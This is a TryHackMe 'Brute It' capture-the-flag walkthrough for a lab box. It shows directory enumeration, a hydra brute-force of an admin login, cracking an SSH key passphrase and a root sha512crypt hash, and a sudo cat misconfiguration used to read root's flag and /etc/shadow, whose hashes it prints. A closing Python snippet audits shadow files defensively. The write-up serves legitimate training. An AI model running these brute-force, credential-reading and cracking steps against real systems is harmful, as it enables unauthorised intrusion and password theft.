
TryHackMe: Brute It

March 13, 2021

Having fun with TryHackMe again. So, here is the write-up and guideline for passing this Brute It challenge.

Room: https://tryhackme.com/room/bruteit
Level: Easy

Task: Learn how to brute, hash cracking and escalate privileges in this box!

Let's get started.

As usual, open the IP in the browser first. There is nothing hidden here.

Then brute-force the available directories:

# gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.98.X -t 60
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)

OK, found the admin path, so go to the page.

OK, now there is an admin page with a login form. Inspect the webpage source first.

There is a message there saying the username is “admin”. Before using hydra, I need to capture the error message first, which is “Username or password invalid”. So, using hydra, brute-force the password with the rockyou.txt dictionary using the POST method.

# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.98.X http-post-form "/admin/:user=admin&pass=^PASS^:Username or password invalid"
...
[80][http-post-form] host: 10.10.98.99 login: admin password: XXXXXX
...

Found the password! Let's log in.

There is a flag there. OK, now there is a link to a page with an RSA private key.

Just download it. It might be used for SSH login. To complete the task, I need to crack the passphrase first. Using John the Ripper:

# python ssh2john.py ~/Downloads/id_rsa > ~/Downloads/id_rsa.hash
# john ~/Downloads/id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
...
XXXXXXXXXX (/home/kapalbiru/Downloads/id_rsa)
...

OK, the passphrase is found! Let's hunt for the user flag.

Now, generate the public key from id_rsa. Change the id_rsa permissions first:

# chmod 400 id_rsa
# ssh-keygen -y -f id_rsa > id_rsa.pub
Enter passphrase: XXXXXXXXXX
# ls -al
-r-------- 1 kapalbiru kapalbiru 1766 Mar 6 00:07 id_rsa
-rw-r--r-- 1 kapalbiru kapalbiru 381 Mar 6 00:37 id_rsa.pub

Let's try SSH using the username “john”:

# ssh john@10.10.98.99 -i id_rsa      
Enter passphrase for key 'id_rsa':
....
....
john@bruteit:~$

OK, now find the user flag.

# ls
user.txt
# cat user.txt
THM{a_password_XX_XX_X_XXXXXX}

Found the user flag! Root all the way then~~

First thing, check whether any cron jobs are running:

# crontab -l
# cat /etc/crontab

There are no cron jobs available. So, let's see what sudo allows for the invoking user:

# sudo -l
...
User john may run the following commands on bruteit:
(root) NOPASSWD: /bin/cat

Oh! If you use the cat command with sudo, there is no need for a password. Let's check GTFOBins for the cat command.

OK, easy access all the way then, using cat:

# sudo cat /root/root.txt
THM{pr1v1l3g3_3sXXXXXXXX}

Found the root flag! Now the last one is to find the root password. Check the shadow file:

# sudo cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

There are 3 users that have password hashes. Just focus on root. Let's crack it. Using hash-identifier, it is unable to detect the type. This looks like sha256crypt or sha512crypt (the $6$ prefix marks sha512crypt, hence hashcat mode 1800).

# hashcat -m 1800 hash.txt ~/wordlists/rockyou.txt --force
...
...
$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:XXXXXXXXX
...
...
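
The hash-identifier tool could not name the algorithm above, but the crypt(3) prefix is definitive, and a defender auditing a shadow file wants more than the prefix: which accounts are locked, which still use legacy md5crypt or reduced rounds, and how old each password is. As an added example that is not part of the original write-up, here is a small Python audit over constructed sample shadow lines (not the box's real file); the "weak/acceptable/strong" labels are this example's own heuristic.

```python
from datetime import date, timedelta
# Constructed sample shadow lines (not the box's real file):
# name:hash:lastchange(days since 1970-01-01):min:max:warn:inactive:expire:
SAMPLE_SHADOW = """\
root:$6$zdk0.jUm$abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
svc:!$6$lockedsalt$lockedhashlockedhashlockedhashlocked:18400:0:99999:7:::
legacy:$1$s4lt$0123456789abcdef:18300:0:99999:7:::
ops:$5$rounds=2000$s4lt$hashhashhashhashhashhashhashhash:18489:0:99999:7:::
"""

# crypt(3) id prefix -> (algorithm, baseline verdict). Generic hash-identifier
# tools often miss these, but the prefix itself is definitive.
ALGOS = {"$1$": ("md5crypt", "weak"), "$5$": ("sha256crypt", "acceptable"),
         "$6$": ("sha512crypt", "acceptable"), "$y$": ("yescrypt", "strong"),
         "$2b$": ("bcrypt", "strong")}

def classify_hash(field):
    """Return (algorithm, verdict, rounds) for one shadow hash field."""
    if field == "" or field.startswith(("*", "!")):  # no usable password
        return ("locked", "locked", None)
    for prefix, (algo, verdict) in ALGOS.items():
        if field.startswith(prefix):
            rounds = None
            if prefix in ("$5$", "$6$"):
                rounds = 5000  # glibc default when no rounds= parameter is set
                params = field[len(prefix):].split("$")[0]
                if params.startswith("rounds="):
                    rounds = int(params[len("rounds="):])
                    if rounds < 5000:  # below the default: cheaper to crack
                        verdict = "weak"
            return (algo, verdict, rounds)
    return ("unknown", "unknown", None)

def audit_shadow(text):
    """One record per account whose hash could be attacked offline, with the
    algorithm verdict and the date the password was last changed."""
    findings = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) < 3:
            continue
        algo, verdict, rounds = classify_hash(parts[1])
        if verdict == "locked":
            continue
        changed = date(1970, 1, 1) + timedelta(days=int(parts[2]))
        findings.append({"user": parts[0], "algo": algo, "verdict": verdict,
                         "rounds": rounds, "last_change": changed.isoformat()})
    return findings
```

Running audit_shadow on the real file (as root) gives the same three-user picture the write-up reaches by eye, plus the rounds and password-age data needed to decide what to rotate.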

Tada! All tasks complete!


Originally published on Medium.
